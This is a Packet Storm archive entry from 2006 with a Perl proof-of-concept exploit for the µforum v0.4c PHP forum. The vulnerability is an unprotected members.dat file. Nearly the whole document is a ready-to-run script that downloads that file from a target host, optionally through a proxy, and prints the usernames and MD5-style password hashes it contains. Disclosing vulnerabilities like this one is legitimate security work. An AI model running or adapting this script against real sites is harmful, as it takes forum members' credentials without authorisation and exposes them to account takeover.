forumv04c.txt

2006-09-07T00:00:00
ID PACKETSTORM:49710
Type packetstorm
Reporter DarkFig
Modified 2006-09-07T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
# Affected.scr..: µforum v0.4c  
# Poc.ID........: 08060901  
# Type..........: Member's passwords are stored in .dat file no protected by a .htaccess file  
# Risk.level....: Medium  
# Vendor.Status.: Unpatched  
# Src.download..: comscripts.com/scripts/php.forum.1568.html  
# Poc.link......: acid-root.new.fr/poc/08060901.txt  
# Credits.......: DarkFig  
#  
use LWP::UserAgent;  
use HTTP::Request;  
use Getopt::Long;  
use strict;  
  
print STDOUT "\n+", '-' x 36, "+\n";  
print STDOUT "| µforum v0.4c (members.dat) Exploit |\n";  
print STDOUT '+', '-' x 36, "+\n";  
  
my($host,$path,$proxh,$proxu,$proxp);  
my $opt = GetOptions(  
'host=s' => \$host,  
'path=s' => \$path,  
'proxh=s' => \$proxh,  
'proxu=s' => \$proxu,  
'proxp=s' => \$proxp);  
  
if(!$path) {$path = '/';}  
$host .= $path.'membres/members.dat';  
if($host !~ /http/) {$host = 'http://'.$host;}  
  
my $ua = LWP::UserAgent->new();  
$ua->agent('Mozilla');  
$ua->timeout(30);  
$ua->proxy(['http'] => $proxh) if $proxh;  
  
my $req = HTTP::Request->new('GET', $host);  
$req->proxy_authorization_basic($proxu, $proxp) if $proxp;  
  
my $res = $ua->request($req);  
my $dat = $res->content;  
my @tabl= split(/:/, $dat);  
  
foreach (@tabl) {  
if($_ =~ /"(.*)";a/){  
print "\n".$1.'::';}  
  
if($_ =~ /"([a-z0-9]{32})";i/){  
print $1;}  
}  
  
print "\n";  
exit(0);  
`